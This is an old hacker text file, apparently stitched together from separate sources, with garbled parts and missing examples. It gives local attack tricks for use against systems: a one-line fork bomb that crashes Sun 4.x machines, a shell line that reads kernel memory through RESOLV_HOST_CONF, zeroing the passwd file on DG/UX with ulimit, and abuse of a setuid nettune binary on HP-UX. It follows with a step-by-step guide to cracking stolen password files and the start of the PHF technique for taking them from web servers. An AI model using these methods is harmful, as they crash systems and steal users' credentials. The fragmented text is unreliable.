$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS ----------------------------------

Thanks to Mr David Honig for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a".Running "a" will quickly disable a Sun 4.x machine, even disallowing(counter to specs) root login as the kernel process table fills."

" The cute thing is the size of thescript, and how few keystrokes it takes to bring down a Sunas a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT---------------------------------

ulimit is used to set a limit on the system resources available to theshell. If ulimit 0 is called before /etc/passwd, under DG/UX, will thepasswd file be set to zero.

.D.13. NETTUNE AND HP-UX------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX meaningthat any user can reset all ICMP, IP and TCP kernelparameters, for example the following parameters:

This is another example of a password file, only this one has one littledifference, it's shadowed. Shadowed password files don't let you view orcopy the actual encrypted password. This causes problems for the passwordcracker and dictionary maker(both explained later in the text). Below isanother example of a shadowed password file:

Shadowed password files have an "x" in the place of a password or sometimesthey are disguised as an * as well.

Now that you know a little more about what the actual password file lookslike you should be able to identify a normal encrypted pw from a shadowedpw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although thefiles vary from system to system. 1.The first step that you would take isto download or copy the file. 2. The second step is to find a passwordcracker and a dictionary maker. Although it's nearly impossible to find agood cracker there are a few ok ones out there. I recomend that you lookfor Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.Now for a dictionary maker or a dictionary file... When you start acracking prog you will be asked to find the the password file. That's wherea dictionary maker comes in. You can download one from nearly every hackerpage on the net. A dictionary maker finds all the possible lettercombinations with the alphabet that you choose(ASCII, caps, lowercase, andnumeric letters may also be added) . We will be releasing our pasword fileto the public soon, it will be called, Psychotic Candy, "The Perfect Drug."As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it givesyou.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact thateverybody already knows it and most servers have already found out aboutthe bug and fixed it. But since I have been asked questions about the phfI decided to include it.

The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you dois open a browser and type in the following link: